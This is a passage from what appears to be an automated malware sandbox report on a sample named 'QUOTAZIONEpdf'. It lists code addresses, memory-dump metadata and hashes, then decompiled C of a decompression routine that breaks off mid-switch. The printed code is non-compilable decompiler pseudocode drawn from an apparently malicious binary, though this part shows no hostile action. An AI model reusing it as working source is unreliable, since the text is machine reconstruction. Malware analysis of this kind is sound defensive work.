                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8
                0x00000000
                0x0040640d

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
